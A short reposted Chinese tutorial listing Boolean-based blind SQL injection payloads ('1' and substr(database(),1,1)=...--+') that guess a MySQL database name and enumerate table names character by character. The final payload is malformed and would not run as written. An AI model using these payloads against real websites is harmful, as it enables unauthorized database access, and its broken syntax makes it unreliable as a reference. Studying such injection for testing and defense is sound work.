Boolean (布爾型) 注入攻擊

本文轉載自查看原文 2020-02-29 09:15 786 sql注入

步驟：

　　1' and length(database())>=1--+ //判斷數據庫的長度

　　1' and substr(database(),1,1)=‘t’ --+ //判斷數據庫第一個字母的值

　　1' and substr(database(),2,1)=‘q’ --+ //判斷數據庫的第二個字母的值

　　1' and ord(substr(database(),1,1))=115--+ //利用ord和ASCII判斷數據庫庫名

　　1' and substr(database(),2,1)=’q’--+ //利用substr判斷數據庫的庫名

　　1' and substr(select table_name from information_schema.table wheretable_schema=‘sql’ limit 0,1),1,1)=‘e’ --+ //利用substr判斷數據庫的表名

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 什么是布爾型（boolean）數據類型？ boolean(布爾型) 兩個值：true(真)orfalse(假) SQL注入——布爾型盲注注入攻擊——手工注入篇——SQL手工注入漏洞測試(MySQL數據庫) SQL注入之Boolean型盲注 [LeetCode] 1106. Parsing A Boolean Expression 解析一個布爾型表達式 boolean(布爾類型) CTFHub題解-技能樹-Web-SQL注入(整數型、字符型、報錯注入、布爾盲注)【一】 SQL注入——布爾注入整型與布爾型的轉換 javascript類型系統——布爾Boolean類型